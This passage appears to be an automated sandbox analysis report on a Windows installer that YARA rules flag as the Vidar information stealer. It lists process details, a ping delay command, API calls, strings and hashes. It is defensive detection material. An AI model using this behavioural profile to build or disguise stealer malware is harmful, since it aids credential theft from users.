Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 7%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:42:32
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0xce0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.1%
Total number of Nodes:	1367
Total number of Limit Nodes:	22

Executed Functions

Function 004034F7 Relevance: 84.4, APIs: 34, Strings: 14, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
DeleteFileW.KERNELBASE(1033), ref: 00403839
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(00438800,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
ExitProcess.KERNEL32(?), ref: 00403A23
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

1033, xrefs: 00403834
NSIS Error, xrefs: 00403658
UXTHEME, xrefs: 004035E5, 004035EA, 004035F0
C:\Users\user\AppData\Local\Temp\, xrefs: 004037C8, 004037CD, 004037E3, 004037EF, 004037FE, 0040380B, 00403817, 0040381F, 0040391D, 0040392E, 00403939, 00403945, 00403956, 00403965, 00403A1B
TMP, xrefs: 00403820
C:\Users\user\Desktop, xrefs: 0040393F, 00403944, 00403977
Error launching installer, xrefs: 004038C9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 004038F2
.tmp, xrefs: 00403934
TEMP, xrefs: 00403818
~nsu, xrefs: 00403918
Low, xrefs: 00403806
\Temp, xrefs: 004037EA
SeShutdownPrivilege, xrefs: 00403A6B

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-4051844609
Opcode ID: 6a201c649498f46d561448cca06b00f6a05d6c8263ed9975ecbcae0aa3d607cd
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: 6a201c649498f46d561448cca06b00f6a05d6c8263ed9975ecbcae0aa3d607cd
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405706
GetDlgItem.USER32(?,000003EE), ref: 00405715
GetClientRect.USER32(?,?), ref: 00405752
GetSystemMetrics.USER32(00000002), ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32(?,000003EC), ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32(?,000003F8), ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32(?,000003EC), ref: 00405868
CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
GetWindowRect.USER32(?,?), ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32(00000000), ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
FindClose.KERNEL32(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32(?,?), ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32(?,00000001), ref: 004040FD
GetDlgItem.USER32(?,00000002), ref: 00404107
SetClassLongW.USER32(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32(?,00000003), ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32(00000000), ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901

GetUserDefaultUILanguage.KERNELBASE(00000002,75573420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75573420), ref: 00403CB7
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403D1E
RegisterClassW.USER32(004291C0), ref: 00403D5B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
RegisterClassW.USER32(004291C0), ref: 00403E20
DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F

Strings

1033, xrefs: 00403BD6, 00403C32
.DEFAULT\Control Panel\International, xrefs: 00403C22
_Nb, xrefs: 00403D3A, 00403DA2
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BBB
Control Panel\Desktop\ResourceLocale, xrefs: 00403BEA
.exe, xrefs: 00403CC4
RichEdit, xrefs: 00403E11
RichEd20, xrefs: 00403DE4
RichEdit20W, xrefs: 00403E02, 00403E08
RichEd32, xrefs: 00403DF2
: Completed, xrefs: 00403C7E, 00403C87, 00403C95, 00403CE4, 00403CEA

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-807418202
Opcode ID: fb649e24f98e44229479f169acb53c45bca4c534de1dfb1f3cfba33920d5d302
Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
Opcode Fuzzy Hash: fb649e24f98e44229479f169acb53c45bca4c534de1dfb1f3cfba33920d5d302
Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,?,?,?,?,00403847,?), ref: 004030AA

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C

Strings

C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
Error launching installer, xrefs: 004030CD
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
soft, xrefs: 0040316B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Null, xrefs: 00403174
G8@, xrefs: 00403227, 00403242
Inst, xrefs: 00403162

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-33365754
Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

Strings

Completed, xrefs: 00406569
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
: Completed, xrefs: 0040656E, 00406621, 00406628, 0040662C, 00406649, 0040665E, 00406671, 00406686, 004066B3, 004066E8, 004066EE, 0040670B, 0040671E, 0040673C, 00406742, 0040674B, 00406781

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
